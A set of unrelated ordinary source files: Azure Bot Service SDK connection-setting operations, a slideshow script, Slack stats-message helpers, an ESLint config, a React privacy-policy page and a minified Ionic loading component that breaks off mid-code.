        request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        # 200 (updated) and 201 (created) both carry a ConnectionSetting body.
        if response.status_code == 200:
            deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'}  # type: ignore

    def update(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        connection_name,  # type: str
        parameters,  # type: "_models.ConnectionSetting"
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.ConnectionSetting"
        """Updates a Connection Setting registration for a Bot Service.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :param connection_name: The name of the Bot Service Connection Setting resource.
        :type connection_name: str
        :param parameters: The parameters to provide for updating the Connection Setting.
        :type parameters: ~azure.mgmt.botservice.models.ConnectionSetting
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ConnectionSetting, or the result of cls(response)
        :rtype: ~azure.mgmt.botservice.models.ConnectionSetting
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ConnectionSetting"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        content_type = kwargs.pop("content_type", "application/json")
        accept = "application/json"

        # Construct URL
        url = self.update.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        # Serialize the request body and send the PATCH (partial update) request.
        body_content_kwargs = {}  # type: Dict[str, Any]
        body_content = self._serialize.body(parameters, 'ConnectionSetting')
        body_content_kwargs['content'] = body_content
        request = self._client.patch(url, query_parameters, header_parameters, **body_content_kwargs)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200, 201]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        # Both accepted status codes carry a ConnectionSetting body.
        if response.status_code == 200:
            deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if response.status_code == 201:
            deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'}  # type: ignore

    def get(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        connection_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> "_models.ConnectionSetting"
        """Get a Connection Setting registration for a Bot Service.

        Unlike :meth:`list_with_secrets`, this uses a plain GET and the returned
        setting does not include secret values.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :param connection_name: The name of the Bot Service Connection Setting resource.
        :type connection_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: ConnectionSetting, or the result of cls(response)
        :rtype: ~azure.mgmt.botservice.models.ConnectionSetting
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ConnectionSetting"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        accept = "application/json"

        # Construct URL
        url = self.get.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.get(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        deserialized = self._deserialize('ConnectionSetting', pipeline_response)

        if cls:
            return cls(pipeline_response, deserialized, {})

        return deserialized
    get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'}  # type: ignore

    def delete(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        connection_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> None
        """Deletes a Connection Setting registration for a Bot Service.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :param connection_name: The name of the Bot Service Connection Setting resource.
        :type connection_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: None, or the result of cls(response)
        :rtype: None
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType[None]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        accept = "application/json"

        # Construct URL
        url = self.delete.metadata['url']  # type: ignore
        path_format_arguments = {
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
            'connectionName': self._serialize.url("connection_name", connection_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][\sa-zA-Z0-9_.-]*$'),
            'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}  # type: Dict[str, Any]
        query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

        # Construct headers
        header_parameters = {}  # type: Dict[str, Any]
        header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

        request = self._client.delete(url, query_parameters, header_parameters)
        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        # 204 means the resource was already absent; both outcomes are success.
        if response.status_code not in [200, 204]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            error = self._deserialize(_models.Error, response)
            raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

        if cls:
            return cls(pipeline_response, None, {})

    delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/Connections/{connectionName}'}  # type: ignore

    def list_by_bot_service(
        self,
        resource_group_name,  # type: str
        resource_name,  # type: str
        **kwargs  # type: Any
    ):
        # type: (...) -> Iterable["_models.ConnectionSettingResponseList"]
        """Returns all the Connection Settings registered to a particular BotService resource.

        :param resource_group_name: The name of the Bot resource group in the user subscription.
        :type resource_group_name: str
        :param resource_name: The name of the Bot resource.
        :type resource_name: str
        :keyword callable cls: A custom type or function that will be passed the direct response
        :return: An iterator like instance of either ConnectionSettingResponseList or the result of cls(response)
        :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.botservice.models.ConnectionSettingResponseList]
        :raises: ~azure.core.exceptions.HttpResponseError
        """
        cls = kwargs.pop('cls', None)  # type: ClsType["_models.ConnectionSettingResponseList"]
        error_map = {
            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
        }
        error_map.update(kwargs.pop('error_map', {}))
        api_version = "2020-06-02"
        accept = "application/json"

        def prepare_request(next_link=None):
            # Build the request for the first page (no next_link) or a follow-up page.
            # Construct headers
            header_parameters = {}  # type: Dict[str, Any]
            header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

            if not next_link:
                # Construct URL
                url = self.list_by_bot_service.metadata['url']  # type: ignore
                path_format_arguments = {
                    'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
                    'resourceName': self._serialize.url("resource_name", resource_name, 'str', max_length=64, min_length=2, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
                    'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
                }
                url = self._client.format_url(url, **path_format_arguments)
                # Construct parameters
                query_parameters = {}  # type: Dict[str, Any]
                query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

                request = self._client.get(url, query_parameters, header_parameters)
            else:
                # The continuation link already embeds the query string.
                url = next_link
                query_parameters = {}  # type: Dict[str, Any]
                request = self._client.get(url, query_parameters, header_parameters)
            return request

        def extract_data(pipeline_response):
            # Deserialize one page and return (continuation token, items iterator).
            deserialized = self._deserialize('ConnectionSettingResponseList', pipeline_response)
            list_of_elem = deserialized.value
            if cls:
                list_of_elem = cls(list_of_elem)
            return deserialized.next_link or None, iter(list_of_elem)

        def get_next(next_link=None):
            # Fetch one page, raising on any non-200 response.
            request = prepare_request(next_link)

            pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
            response = pipeline_response.http_response

            if response.status_code not in [200]:
                error = self._deserialize(_models.Error, response)
                map_error(status_code=response.status_code, response=response, error_map=error_map)
                raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)

            return pipeline_response

        # ItemPaged lazily drives get_next/extract_data as the caller iterates.
        return ItemPaged(
            get_next, extract_data
        )
    list_by_bot_service.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.BotService/botServices/{resourceName}/connections'}  # type: ignore
|
//Contains the Javascript necessary to make the slideshow operate (Side note: Finally, single line comments!!)
//The best part is this code does not rely on jQuery being installed
//Code from http://themarklee.com/2013/12/26/simple-diy-responsive-slideshow-made-html5-css3-javascript/
(function(document){ // Slideshow behavior, no jQuery required
    var goldCounter = 0, // index of the slide currently shown
        $goldItems = document.querySelectorAll('.goldSlides figure'),
        numGoldItems = $goldItems.length; // number of slides
        // Bug fix: the original declared `numgoldItems` (lowercase g) but read
        // `numGoldItems`, and read undeclared `counter` / `$items` below,
        // so showCurrent() threw a ReferenceError on every click.
    // Show only the slide selected by goldCounter; hide all others.
    var showCurrent = function(){
        // Math.abs + modulo wraps the counter when it runs past either end.
        var goldItemToShow = Math.abs(goldCounter % numGoldItems);
        [].forEach.call($goldItems, function(el){ // hide every slide
            el.classList.remove('show');
        });
        $goldItems[goldItemToShow].classList.add('show'); // reveal the current slide
    };
    document.querySelector('.next').addEventListener('click', function() {
        goldCounter++; // "next" arrow advances one slide
        showCurrent();
    }, false);
    document.querySelector('.prev').addEventListener('click', function() {
        goldCounter--; // "previous" arrow goes back one slide
        showCurrent();
    }, false);
})(document);
|
const fetch = require('node-fetch')
exports.ERROR_MESSAGE = {
response_type: 'ephemeral',
text:
':x: Something went wrong with your request. Please try again and if the error persists, post a message at <#C319P09PB>.', // move to Parameter Store so it can be used for all generic errors?
}
exports.HELP_BLOCK = {
response_type: 'ephemeral',
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text:
'Using the `/osmcha-stats` command, you can get stats on changesets based on either a project ID or hashtags:',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_blue_diamond: `/osmcha-stats [projectID]` for stats on changesets of a Tasking Manager project (e.g. `/osmcha-stats 8172`)',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_blue_diamond: `/osmcha-stats [hashtags]` for stats on changesets with specific hashtags. Separate multiple hashtags with a space (e.g. `/osmcha-stats #hotosm-project-8386 #HOTPH`)',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_red_triangle: Note that when filtering using hashtags, the hashtags must be in the same order as listed in the changesets.',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text:
':small_red_triangle: For best results, input as many hashtags as you can to filter the changesets more precisely. If the changeset data is too big, we would not be able to present them here.',
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text: 'If you need more help, post a message at <#C319P09PB>',
},
},
],
}
// Split `flags` (mrkdwn field objects) into Slack "section" blocks holding
// at most `size` fields each, preserving order.
const groupFlagsIntoSections = (flags, size) => {
  const chunks = []
  for (let start = 0; start < flags.length; start += size) {
    chunks.push(flags.slice(start, start + size))
  }
  return chunks.map((fields) => ({
    type: 'section',
    fields,
  }))
}
exports.createBlock = (
filterDescriptor,
changesetCount,
changesetFlags,
suspectChangesetCount
) => {
if (changesetCount === 0) {
const noChangesetBlock = {
response_type: 'ephemeral',
text:
`:x: There are *${changesetCount} changesets* under ${filterDescriptor}.\n` +
'Use the `/osmcha-stats help` command for help on using this command.',
}
return noChangesetBlock
}
const ARRAY_COUNT = 4
const suspectChangesetPercentage = Math.round(
(suspectChangesetCount / changesetCount) * 100
)
const flagArray = changesetFlags.reduce((accumulator, flag) => {
if (flag.changesets !== 0) {
accumulator.push({
type: 'mrkdwn',
text: `*${flag.name}*: ${flag.changesets.toLocaleString()}`,
})
}
return accumulator
}, [])
const flagSections = groupFlagsIntoSections(flagArray, ARRAY_COUNT)
const messageBlock = {
response_type: 'ephemeral',
blocks: [
{
type: 'section',
text: {
type: 'mrkdwn',
text: `:page_with_curl: There are *${changesetCount.toLocaleString()} changesets* under ${filterDescriptor}.`,
},
},
{
type: 'section',
text: {
type: 'mrkdwn',
text: `:warning: *${suspectChangesetCount.toLocaleString()} or ${suspectChangesetPercentage}% of changesets* have been flagged as suspicious.\n:small_red_triangle: Here is the breakdown of flags: :small_red_triangle_down:`,
},
},
...flagSections,
],
}
return messageBlock
}
// POST `message` as JSON to the Slack response URL; returns the fetch promise.
exports.sendToSlack = (responseURL, message) =>
  fetch(responseURL, {
    method: 'post',
    headers: {
      'Content-Type': 'application/json',
    },
    body: JSON.stringify(message),
  })
|
// Root ESLint configuration: TypeScript parsing, Prettier compatibility,
// and TSDoc syntax checking for package sources.
module.exports = {
  // Stop ESLint from merging configs found in parent directories.
  root: true,
  parser: '@typescript-eslint/parser',
  // Order matters: the Prettier presets come last so they can switch off
  // formatting rules enabled by the earlier presets.
  extends: [
    'yoctol-base',
    'plugin:@typescript-eslint/recommended',
    'prettier',
    'prettier/@typescript-eslint',
  ],
  env: {
    node: true,
    jest: true,
    jasmine: true,
  },
  plugins: ['@typescript-eslint', 'eslint-plugin-tsdoc'],
  rules: {
    // Base rules disabled in favor of their @typescript-eslint counterparts,
    // or deliberately relaxed for this codebase.
    camelcase: 'off',
    'no-useless-constructor': 'off',
    'import/no-extraneous-dependencies': 'off',
    'import/extensions': 'off',
    '@typescript-eslint/no-useless-constructor': 'error',
    '@typescript-eslint/no-namespace': 'off',
    '@typescript-eslint/camelcase': 'off',
    '@typescript-eslint/ban-ts-comment': 'off',
    '@typescript-eslint/ban-types': 'warn',
  },
  overrides: [
    // Example scripts may use require() freely.
    {
      files: ['examples/**/*.js'],
      rules: {
        '@typescript-eslint/no-var-requires': 'off',
      },
    },
    // Enforce TSDoc comment syntax in published package sources.
    {
      files: ['packages/**/*.ts'],
      rules: {
        'tsdoc/syntax': 'warn',
      },
    },
  ],
  settings: {
    // Resolve imports for both plain JS/JSX and TypeScript sources.
    'import/resolver': {
      node: {
        extensions: ['.js', '.jsx', '.ts', '.tsx'],
      },
      typescript: {},
    },
  },
};
|
/* eslint-disable max-len */
import React, { useEffect } from 'react';
import { Segment } from 'semantic-ui-react';
import ReactPixel from 'react-facebook-pixel';
export const PrivacyPolicy = () => {
useEffect(() => {
ReactPixel.init('898969540474999');
ReactPixel.pageView();
});
return (
<Segment secondary style={{ paddingBottom: 30, marginBottom: 10 }}>
<h1>Privacy Policy</h1>
<p>Effective date: March 28, 2019</p>
<p>Vitaes ("us", "we", or "our") operates the https://vitaes.io website (hereinafter referred to as the "Service").</p>
<p>This page informs you of our policies regarding the collection, use and disclosure of personal data when you use our Service and the choices you have associated with that data.</p>
<p>We use your data to provide and improve the Service. By using the Service, you agree to the collection and use of information in accordance with this policy. Unless otherwise defined in this Privacy Policy, the terms used in this Privacy Policy have the same meanings as in our Terms and Conditions, accessible from https://vitaes.io</p>
<h2>Definitions</h2>
<ul>
<li>
<p><strong>Service</strong></p>
<p>Service is the https://vitaes.io website operated by Vitaes</p>
</li>
<li>
<p><strong>Personal Data</strong></p>
<p>Personal Data means data about a living individual who can be identified from those data (or from those and other information either in our possession or likely to come into our possession).</p>
</li>
<li>
<p><strong>Usage Data</strong></p>
<p>Usage Data is data collected automatically either generated by the use of the Service or from the Service infrastructure itself (for example, the duration of a page visit).</p>
</li>
<li>
<p><strong>Cookies</strong></p>
<p>Cookies are small files stored on your device (computer or mobile device).</p>
</li>
<li>
<p><strong>Data Controller</strong></p>
<p>Data Controller means the natural or legal person who (either alone or jointly or in common with other persons) determines the purposes for which and the manner in which any personal information are, or are to be, processed.</p>
<p>For the purpose of this Privacy Policy, we are a Data Controller of your Personal Data.</p>
</li>
<li>
<p><strong>Data Processors (or Service Providers)</strong></p>
<p>Data Processor (or Service Provider) means any natural or legal person who processes the data on behalf of the Data Controller.</p>
<p>We may use the services of various Service Providers in order to process your data more effectively.</p>
</li>
<li>
<p><strong>Data Subject (or User)</strong></p>
<p>Data Subject is any living individual who is using our Service and is the subject of Personal Data.</p>
</li>
</ul>
<h2>Information Collection and Use</h2>
<p>We collect several different types of information for various purposes to provide and improve our Service to you.</p>
<h3>Types of Data Collected</h3>
<h4>Personal Data</h4>
<p>While using our Service, we may ask you to provide us with certain personally identifiable information that can be used to contact or identify you ("Personal Data"). Personally identifiable information may include, but is not limited to:</p>
<ul>
<li>Email address</li>
<li>First name and last name</li>
<li>Phone number</li>
<li>Address, State, Province, ZIP/Postal code, City</li>
<li>Cookies and Usage Data</li>
</ul>
<h4>Usage Data</h4>
<p>We may also collect information on how the Service is accessed and used ("Usage Data"). This Usage Data may include information such as your computer's Internet Protocol address (e.g. IP address), browser type, browser version, the pages of our Service that you visit, the time and date of your visit, the time spent on those pages, unique device identifiers and other diagnostic data.</p>
<h4>Tracking & Cookies Data</h4>
<p>We use cookies and similar tracking technologies to track the activity on our Service and we hold certain information.</p>
<p>Cookies are files with a small amount of data which may include an anonymous unique identifier. Cookies are sent to your browser from a website and stored on your device. Other tracking technologies are also used such as beacons, tags and scripts to collect and track information and to improve and analyse our Service.</p>
<p>You can instruct your browser to refuse all cookies or to indicate when a cookie is being sent. However, if you do not accept cookies, you may not be able to use some portions of our Service.</p>
<p>Examples of Cookies we use:</p>
<ul>
<li>
<strong>Session Cookies.</strong>
{' '}
We use Session Cookies to operate our Service.
</li>
<li>
<strong>Preference Cookies.</strong>
{' '}
We use Preference Cookies to remember your preferences and various settings.
</li>
<li>
<strong>Security Cookies.</strong>
{' '}
We use Security Cookies for security purposes.
</li>
</ul>
<h2>Use of Data</h2>
<p>Vitaes uses the collected data for various purposes:</p>
<ul>
<li>To provide and maintain our Service</li>
<li>To notify you about changes to our Service</li>
<li>To allow you to participate in interactive features of our Service when you choose to do so</li>
<li>To provide customer support</li>
<li>To gather analysis or valuable information so that we can improve our Service</li>
<li>To monitor the usage of our Service</li>
<li>To detect, prevent and address technical issues</li>
</ul>
<h2>Legal Basis for Processing Personal Data under the General Data Protection Regulation (GDPR)</h2>
<p>If you are from the European Economic Area (EEA), Vitaes legal basis for collecting and using the personal information described in this Privacy Policy depends on the Personal Data we collect and the specific context in which we collect it.</p>
<p>Vitaes may process your Personal Data because:</p>
<ul>
<li>We need to perform a contract with you</li>
<li>You have given us permission to do so</li>
<li>The processing is in our legitimate interests and it is not overridden by your rights</li>
<li>To comply with the law</li>
</ul>
<h2>Retention of Data</h2>
<p>Vitaes will retain your Personal Data only for as long as is necessary for the purposes set out in this Privacy Policy. We will retain and use your Personal Data to the extent necessary to comply with our legal obligations (for example, if we are required to retain your data to comply with applicable laws), resolve disputes and enforce our legal agreements and policies.</p>
<p>Vitaes will also retain Usage Data for internal analysis purposes. Usage Data is generally retained for a shorter period of time, except when this data is used to strengthen the security or to improve the functionality of our Service, or we are legally obligated to retain this data for longer periods.</p>
<h2>Transfer of Data</h2>
<p>Your information, including Personal Data, may be transferred to - and maintained on - computers located outside of your state, province, country or other governmental jurisdiction where the data protection laws may differ from those of your jurisdiction.</p>
<p>If you are located outside Brazil and choose to provide information to us, please note that we transfer the data, including Personal Data, to Brazil and process it there.</p>
<p>Your consent to this Privacy Policy followed by your submission of such information represents your agreement to that transfer.</p>
<p>Vitaes will take all the steps reasonably necessary to ensure that your data is treated securely and in accordance with this Privacy Policy and no transfer of your Personal Data will take place to an organisation or a country unless there are adequate controls in place including the security of your data and other personal information.</p>
<h2>Disclosure of Data</h2>
<h3>Legal Requirements</h3>
<p>Vitaes may disclose your Personal Data in the good faith belief that such action is necessary to:</p>
<ul>
<li>To comply with a legal obligation</li>
<li>To protect and defend the rights or property of Vitaes</li>
<li>To prevent or investigate possible wrongdoing in connection with the Service</li>
<li>To protect the personal safety of users of the Service or the public</li>
<li>To protect against legal liability</li>
</ul>
<h2>Security of Data</h2>
<p>The security of your data is important to us but remember that no method of transmission over the Internet or method of electronic storage is 100% secure. While we strive to use commercially acceptable means to protect your Personal Data, we cannot guarantee its absolute security.</p>
<h2>Our Policy on "Do Not Track" Signals under the California Online Protection Act (CalOPPA)</h2>
<p>We do not support Do Not Track ("DNT"). Do Not Track is a preference you can set in your web browser to inform websites that you do not want to be tracked.</p>
<p>You can enable or disable Do Not Track by visiting the Preferences or Settings page of your web browser.</p>
<h2>Your Data Protection Rights under the General Data Protection Regulation (GDPR)</h2>
<p>If you are a resident of the European Economic Area (EEA), you have certain data protection rights. Vitaes aims to take reasonable steps to allow you to correct, amend, delete or limit the use of your Personal Data.</p>
<p>If you wish to be informed about what Personal Data we hold about you and if you want it to be removed from our systems, please contact us.</p>
<p>In certain circumstances, you have the following data protection rights:</p>
<ul>
<li>
<p>
<strong>The right to access, update or delete the information we have on you.</strong>
{' '}
Whenever made possible, you can access, update or request deletion of your Personal Data directly within your account settings section. If you are unable to perform these actions yourself, please contact us to assist you.
</p>
</li>
<li>
<p>
<strong>The right of rectification.</strong>
{' '}
You have the right to have your information rectified if that information is inaccurate or incomplete.
</p>
</li>
<li>
<p>
<strong>The right to object.</strong>
{' '}
You have the right to object to our processing of your Personal Data.
</p>
</li>
<li>
<p>
<strong>The right of restriction.</strong>
{' '}
You have the right to request that we restrict the processing of your personal information.
</p>
</li>
<li>
<p>
<strong>The right to data portability.</strong>
{' '}
You have the right to be provided with a copy of the information we have on you in a structured, machine-readable and commonly used format.
</p>
</li>
<li>
<p>
<strong>The right to withdraw consent.</strong>
{' '}
You also have the right to withdraw your consent at any time where Vitaes relied on your consent to process your personal information.
</p>
</li>
</ul>
<p>Please note that we may ask you to verify your identity before responding to such requests.</p>
<p>You have the right to complain to a Data Protection Authority about our collection and use of your Personal Data. For more information, please contact your local data protection authority in the European Economic Area (EEA).</p>
<h2>Service Providers</h2>
<p>We may employ third party companies and individuals to facilitate our Service ("Service Providers"), provide the Service on our behalf, perform Service-related services or assist us in analysing how our Service is used.</p>
<p>These third parties have access to your Personal Data only to perform these tasks on our behalf and are obligated not to disclose or use it for any other purpose.</p>
<h2>Links to Other Sites</h2>
<p>Our Service may contain links to other sites that are not operated by us. If you click a third party link, you will be directed to that third party's site. We strongly advise you to review the Privacy Policy of every site you visit.</p>
<p>We have no control over and assume no responsibility for the content, privacy policies or practices of any third party sites or services.</p>
<h2>Changes to This Privacy Policy</h2>
<p>We may update our Privacy Policy from time to time. We will notify you of any changes by posting the new Privacy Policy on this page.</p>
<p>We will let you know via email and/or a prominent notice on our Service, prior to the change becoming effective and update the "effective date" at the top of this Privacy Policy.</p>
<p>You are advised to review this Privacy Policy periodically for any changes. Changes to this Privacy Policy are effective when they are posted on this page.</p>
<h2>Contact Us</h2>
<p>If you have any questions about this Privacy Policy, please contact us:</p>
<ul>
<li>By email: latache@vitaes.io</li>
</ul>
</Segment>
);
};
export default PrivacyPolicy;
|
(window.webpackJsonp=window.webpackJsonp||[]).push([[29],{"3N3H":function(e,n,t){"use strict";t.r(n),t.d(n,"IonLoading",function(){return p}),t.d(n,"IonLoadingController",function(){return m});var i=t("B5Ai"),o=t("cBjU"),r=t("dYSE"),a=t("d6Vy");function s(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.01,.3),o.fromTo("opacity",.01,1).fromTo("scale",1.1,1),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function d(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.3,0),o.fromTo("opacity",.99,0).fromTo("scale",1,.9),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function c(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.01,.32),o.fromTo("opacity",.01,1).fromTo("scale",1.1,1),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}function l(e,n){var t=new e,i=new e;i.addElement(n.querySelector("ion-backdrop"));var o=new e;return o.addElement(n.querySelector(".loading-wrapper")),i.fromTo("opacity",.32,0),o.fromTo("opacity",.99,0).fromTo("scale",1,.9),Promise.resolve(t.addElement(n).easing("ease-in-out").duration(200).add(i).add(o))}var p=function(){function e(){this.presented=!1,this.keyboardClose=!0,this.duration=0,this.backdropDismiss=!1,this.showBackdrop=!0,this.translucent=!1,this.animated=!0}return e.prototype.componentWillLoad=function(){void 0===this.spinner&&(this.spinner=this.config.get("loadingSpinner",this.config.get("spinner","ios"===this.mode?"lines":"crescent")))},e.prototype.onBackdropTap=function(){this.dismiss(void 0,r.a)},e.prototype.present=function(){return i.a(this,void 0,void 0,function(){var e=this;return 
i.c(this,function(n){switch(n.label){case 0:return[4,Object(r.c)(this,"loadingEnter",s,c,void 0)];case 1:return n.sent(),this.duration>0&&(this.durationTimeout=setTimeout(function(){return e.dismiss()},this.duration+10)),[2]}})})},e.prototype.dismiss=function(e,n){return this.durationTimeout&&clearTimeout(this.durationTimeout),Object(r.d)(this,e,n,"loadingLeave",d,l)},e.prototype.onDidDismiss=function(){return Object(r.e)(this.el,"ionLoadingDidDismiss")},e.prototype.onWillDismiss=function(){return Object(r.e)(this.el,"ionLoadingWillDismiss")},e.prototype.hostData=function(){var 